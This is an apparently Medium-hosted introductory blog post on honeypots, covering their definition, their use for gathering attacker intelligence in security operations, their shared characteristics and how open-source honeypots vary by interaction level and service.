Honeypots Explained: In the Wild and in SecOps

A honeypot is a computer configured to be vulnerable in an attempt to log and study unauthorized interactions. Because Internet-facing systems are subject to constant automated attacks, it is important to be aware that any port open to the internet provides a bridge for outside parties to interact with your system. When we leave our honeypots out, we are mimicking signs of vulnerable systems hoping attackers come in and try to execute on their attacks. Think about that next time you’re looking at vulnerability reports. 🙇

Honeypot Uses

Honeypots are used to collect data on attacking behaviors. The attack source, techniques used, their success or failure rates, and malware samples can all be extracted from honeypot logs. Security teams may take action based on intelligence sourced from the analyzed data. Patterns seen in the attacker’s behavior are identified within security logs to alert on security events that matched the behaviors observed in honeypot logs. Security teams are benefited because it give them a unique opportunity to proactively blocklist suspicious behaviors before systems are infected.

A honeypot of mine that got a bit… funky.

Honeypot Characteristics

Honeypots share 3 common characteristics regardless of type or service:

  1. Honeypots are intended to be interacted with by unauthorized parties;
  2. Honeypots log unauthorized behavior.

Honeypot Categories

There likely already exist honeypot solutions that apply to your specific industry and services used within your organization or even in your home network. I found FOSS Honeypots varied on two major dimensions: interaction level and service offered.

I write about DFIR, GRC, and defensive security topics.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store